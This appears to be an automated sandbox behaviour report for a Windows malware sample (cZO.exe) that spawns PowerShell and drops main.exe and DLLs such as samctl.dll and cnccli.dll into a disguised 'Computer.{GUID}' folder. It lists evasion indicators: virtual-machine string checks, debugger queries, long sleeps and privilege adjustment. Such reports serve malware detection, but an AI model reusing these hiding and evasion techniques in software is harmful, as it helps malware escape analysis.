Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX (15 identical entries)
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (10 identical entries)
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX (54 identical entries)
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy, 22_2_00007FF8B91834F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy, 32_2_00007FF8B91834F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 22_2_00007FF8B9152BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 22_2_00007FF8B9185728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 22_2_00007FF8BA4F2BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 22_2_00007FF8BFB31D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 22_2_00007FF8BFB52CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 22_2_00007FF8BFB82278
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 32_2_00007FF8B9152BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 32_2_00007FF8B9185728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 32_2_00007FF8BA502BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 32_2_00007FF8BFB31D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 32_2_00007FF8BFB52CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 32_2_00007FF8BFB82278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6454
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3298
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7521
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2066
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7569
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2055
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Window / User API: threadDelayed 1480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Window / User API: threadDelayed 2649
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\GEGgzh0s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\XpOp833v
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\I77yQ5in
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\o6oDuAJl
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\EgwqOk24
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\OwuZZod2
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\YXkdIYk6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\YkhL6reh
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\GmdNT1AN
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes (graph_22-61680)
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_6-10282)
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe API coverage: 1.5 %
Source: C:\Users\user\Desktop\cZO.exe TID: 6716 Thread sleep time: -18600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep count: 6454 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep count: 3298 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 Thread sleep count: 7521 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552 Thread sleep count: 2066 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600 Thread sleep count: 7569 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380 Thread sleep count: 2055 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1536 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3836 Thread sleep count: 155 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3836 Thread sleep time: -77500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5352 Thread sleep count: 130 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5352 Thread sleep time: -65000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276 Thread sleep count: 1480 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276 Thread sleep time: -4440000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1524 Thread sleep count: 45 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276 Thread sleep count: 2649 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276 Thread sleep time: -7947000s >= -30000s
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\cZO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\cZO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\cZO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\cZO.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF775723DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,6_2_00007FF775723DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE031CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF6BE031CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA4F4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA4F4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB857B3
Source: C:\Users\user\Desktop\cZO.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: main.exe, 00000020.00000002.3261486868.00000270D3738000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm3
Source: svchost.exe, 0000001F.00000002.3263426432.000001D379836000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: main.exe, 00000016.00000002.3154747003.000002234F1D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510794984.0000021015F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: cZO.exe, 00000001.00000002.3262302177.0000000000911000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456376658.000002234F1DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\cZO.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,6_2_00007FF77572FF1F
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF7757245D5 fopen,_fsopen,fseek,_errno,_errno,_errno,_errno,_errno,_errno,_errno,_errno,ftell,_errno,_errno,_errno,_errno,fseek,fread,_errno,_errno,_errno,_errno,GetProcessHeap,HeapAlloc,_errno,_errno,_errno,_errno,GetProcessHeap,HeapFree,fclose,6_2_00007FF7757245D5
Source: C:\Users\user\Desktop\cZO.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
